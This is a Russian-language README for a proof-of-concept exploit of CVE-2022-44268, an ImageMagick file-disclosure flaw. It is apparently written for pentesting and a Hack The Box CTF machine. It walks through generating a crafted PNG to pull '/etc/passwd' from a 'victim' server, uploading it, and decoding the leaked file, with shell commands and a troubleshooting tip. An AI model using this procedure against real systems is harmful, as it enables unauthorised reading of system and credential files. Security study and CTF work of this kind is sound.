
Эксплойт-доказательство концепции для CVE-2022-44268, позволяющий произвольное чтение файлов через специально созданные PNG-изображения, обрабатываемые ImageMagick. Включает скрипты генерации и декодирования для пентеста и CTF-задач.
также используется в htb pilgrimage
Исследователи из MetabaseQ обнаружили CVE-2022-44268, т.е. ImageMagick 7.1.0-49 уязвим для раскрытия информации. При разборе PNG-изображения (например, для изменения размера) результирующее изображение может содержать содержимое произвольного удаленного файла (если у двоичного файла ImageMagick есть права на его чтение).
Шаг 1:
выполните
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
Шаг 2:
выполните
python3 magick_exploit.py generate -l [local_file] -o [output_file]
здесь в данном случае локальный файл — '/etc/passwd', который я хочу получить с машины жертвы.
Шаг 3:
загрузите файл изображения на веб-сайт
Шаг 4:
получите преобразованный файл изображения с веб-сайта. назовите его 'downloaded_image.png'
Шаг 5:
выполните
python3 decode_profile.py

если возникает ошибка типа
"/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
profile = output_str.split("Raw profile type: \n\n ")[1].split('Date:create:')[0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
Это означает, что указанный файл не существует. Используйте /etc/passwd для проверки.